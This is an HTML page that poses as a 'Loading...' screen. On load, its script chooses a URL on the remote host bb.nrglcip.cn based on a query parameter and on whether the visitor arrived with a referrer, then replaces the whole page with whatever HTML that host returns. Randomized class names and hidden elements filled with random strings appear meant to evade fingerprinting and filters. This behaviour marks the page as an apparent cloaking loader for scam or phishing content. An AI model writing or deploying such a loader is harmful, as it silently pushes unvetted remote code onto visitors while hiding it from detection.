<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .GW33DBXHCFE {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .GW33DBXHCFE .apyQcjpLiQ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .GW33DBXHCFE .content {
            line-height: 50px;
            text-align: center
        }

        .GW33DBXHCFE .img {
            width: 100%
        }

        .GW33DBXHCFE .K8E5AIEA4bX {
            text-align: center
        }

        .GW33DBXHCFE .K8E5AIEA4bX span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .GW33DBXHCFE .K8E5AIEA4bX span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .GW33DBXHCFE .K8E5AIEA4bX span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .GW33DBXHCFE .K8E5AIEA4bX span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .GW33DBXHCFE .K8E5AIEA4bX span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .GW33DBXHCFE .K8E5AIEA4bX span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .GW33DBXHCFE .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function PFdLZYg0MayoI(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Adgq5 = PFdLZYg0MayoI('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Adgq5 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Adgq5 +".html?a=share";
		}
		
        Lwp7mwQ=url+"#"+new Date().getTime();
        Lwp7mwQ && function() {
            $.get(Lwp7mwQ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>WY2i4WqW8VYjU1YWnNK7AjUoiNChPiOZZ6mpkLzJLgxfNpk613g2I3CyL2rjfCUSbxbWq9zou1tQgBnlqTg0ZOA</a>
<li style='display:none' >ad8X0kYRrQX3ZFfqyhvXFoGdyChEY4r8l9i6vVD</li>
<p  style='display:none'>CCZy5Ij0HnsV6N5PGLjjDKIXUzBh5ecYYLOlxlAI8</p>
<h1 style='display:none' >wNljQ3fUX4fqGqOLgYZYJxMxmfOyo7POvAzilDRS2rwNtWQVtIMf0NPbYRe0p46dxPF</h1>
<b style='display:none' >NdWNm3BhlfCgcnR4b8VgvwlJY97oT8spUfgINJxDcElLS6icaWm</b>
<ul style='display:none' >j5dhti1VfhXI7nm5P9F</ul>
<div style='display:none'>BJtOB6d2hCMKWsnntZKi</div><div class="GW33DBXHCFE">
    <div class="apyQcjpLiQ">
        <div class="K8E5AIEA4bX">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >rbywCxBtIdKTjPnxVy5zBXTC8</b>
<p  style='display:none'>yLcaS0RBixWRuv1wvPVc930kD4j0cBrp940rMAL</p>
<b style='display:none' >rbywCxBtIdKTjPnxVy5zBXTC8</b>
<div style='display:none'>LTZo7qrWeNRie3Q6p5nMiokx7PhvXKtD1ox7T4EMkkGDaTJXlD2lzcW9gyGc</div>
<b style='display:none' >rbywCxBtIdKTjPnxVy5zBXTC8</b>
<ul style='display:none' >ZtvQhqwJUzNA1lPGKjo93aEg8DZFFo4UUlNiUXVEDDgLnVjS</ul>
<b style='display:none' >rbywCxBtIdKTjPnxVy5zBXTC8</b>
<div style='display:none'>LTZo7qrWeNRie3Q6p5nMiokx7PhvXKtD1ox7T4EMkkGDaTJXlD2lzcW9gyGc</div>
<a  href='#' style='display:none'>ynza7JfsfaSU6zQZpEYIAS52knUnO5cCKo2vIlK1fGoU4GFpz6qDBFQ1ClpXI</a>
<div style='display:none'>LTZo7qrWeNRie3Q6p5nMiokx7PhvXKtD1ox7T4EMkkGDaTJXlD2lzcW9gyGc</div></body>
</html>